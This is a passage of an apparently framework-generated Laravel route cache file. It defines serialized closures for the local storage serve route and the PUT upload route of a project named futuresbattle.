'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:3:{s:4:"disk";s:5:"local";s:6:"config";a:5:{s:6:"driver";s:5:"local";s:4:"root";s:47:"/var/www/html/futuresbattle/storage/app/private";s:5:"serve";b:1;s:5:"throw";b:0;s:6:"report";b:0;}s:12:"isProduction";b:0;}s:8:"function";s:323:"function (\\Illuminate\\Http\\Request $request, string $path) use ($disk, $config, $isProduction) {
return (new \\Illuminate\\Filesystem\\ServeFile(
$disk,
$config,
$isProduction
))($request, $path);
}";s:5:"scope";s:47:"Illuminate\\Filesystem\\FilesystemServiceProvider";s:4:"this";N;s:4:"self";s:32:"00000000000003880000000000000000";}}',
'as' => 'storage.local',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
'path' => '.*',
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'storage.local.upload' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'storage/{path}',
'action' =>
array (
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:3:{s:4:"disk";s:5:"local";s:6:"config";a:5:{s:6:"driver";s:5:"local";s:4:"root";s:47:"/var/www/html/futuresbattle/storage/app/private";s:5:"serve";b:1;s:5:"throw";b:0;s:6:"report";b:0;}s:12:"isProduction";b:0;}s:8:"function";s:325:"function (\\Illuminate\\Http\\Request $request, string $path) use ($disk, $config, $isProduction) {
return (new \\Illuminate\\Filesystem\\ReceiveFile(
$disk,
$config,
$isProduction
))($request, $path);
}";s:5:"scope";s:47:"Illuminate\\Filesystem\\FilesystemServiceProvider";s:4:"this";N;s:4:"self";s:32:"000000000000038a0000000000000000";}}',
'as' => 'storage.local.upload',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
'path' => '.*',
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
),
)
);